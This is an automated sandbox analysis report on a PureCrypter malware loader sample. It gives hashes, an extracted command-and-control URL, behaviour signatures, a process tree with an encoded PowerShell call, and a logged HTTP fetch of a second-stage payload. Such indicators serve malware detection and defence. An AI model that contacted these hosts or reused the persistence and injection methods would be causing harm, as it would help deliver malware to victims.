Analysis

  • max time kernel
    112s
  • max time network
    116s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    13-02-2023 07:21

General

  • Target

    e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe

  • Size

    41KB

  • MD5

    ab4a6ddfc90f2d379d70d0fad747f6e5

  • SHA1

    87ac21f928c9f4e3d76cc6ea110b6133defd8507

  • SHA256

    e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90

  • SHA512

    d0512d9629ffe3feee10f8f6bfa5419f97e1da78e7972866f76270326657b5760cc3bb3c594fe4ebbbb22571429f0fe88a007f75991db39136d22ff8dd274815

  • SSDEEP

    768:ppoHKflwYtttWtYtYBtYtxqGGGGGGGGHGGGGGGGGGGGGGGGGGGGGGGGGGGGGUu8y:DoHFGGGGGGGGHGGGGGGGGGGGGGGGGGGH

Malware Config

Extracted

Family

purecrypter

C2

http://163.123.142.210/Zhevuwz.dat

Signatures

  • PureCrypter

    PureCrypter is a .NET malware loader first seen in early 2021.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
    "C:\Users\Admin\AppData\Local\Temp\e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2728
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:996
    • C:\Users\Admin\AppData\Local\Temp\e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
      C:\Users\Admin\AppData\Local\Temp\e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:5040

Network

  • Country flag: US
    GET
    http://163.123.142.210/Zhevuwz.dat
    e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
    Remote address:
    163.123.142.210:80
    Request
    GET /Zhevuwz.dat HTTP/1.1
    Host: 163.123.142.210
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Mon, 13 Feb 2023 07:22:03 GMT
    Content-Type: application/octet-stream
    Content-Length: 1541653
    Last-Modified: Thu, 09 Feb 2023 23:51:37 GMT
    Connection: keep-alive
    ETag: "63e58709-178615"
    Accept-Ranges: bytes
  • 163.123.142.210:80
    http://163.123.142.210/Zhevuwz.dat
    http
    e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
    36.4kB
    1.6MB
    679
    1137

    HTTP Request

    GET http://163.123.142.210/Zhevuwz.dat

    HTTP Response

    200
  • 93.184.221.240:80
    322 B
    7
  • 93.184.221.240:80
    322 B
    7
  • 104.80.225.205:443
    322 B
    7
  • 179.43.155.202:9090
    e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
    260 B
    5
  • 8.253.208.121:80
    322 B
    7
  • 8.253.208.121:80
    322 B
    7
  • 179.43.155.202:9091
    e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
    260 B
    5
  • 179.43.155.202:9092
    e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
    260 B
    5
  • 179.43.155.202:8444
    e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
    208 B
    4
Downloads

  • memory/996-138-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp
    Filesize: 10.8MB
  • memory/996-136-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp
    Filesize: 10.8MB
  • memory/996-139-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp
    Filesize: 10.8MB
  • memory/2728-133-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp
    Filesize: 10.8MB
  • memory/2728-134-0x00000223A58D0000-0x00000223A58F2000-memory.dmp
    Filesize: 136KB
  • memory/2728-137-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp
    Filesize: 10.8MB
  • memory/2728-132-0x000002238A300000-0x000002238A30E000-memory.dmp
    Filesize: 56KB
  • memory/2728-143-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp
    Filesize: 10.8MB
  • memory/5040-140-0x0000000000400000-0x000000000048C000-memory.dmp
    Filesize: 560KB
  • memory/5040-142-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp
    Filesize: 10.8MB
  • memory/5040-144-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp
    Filesize: 10.8MB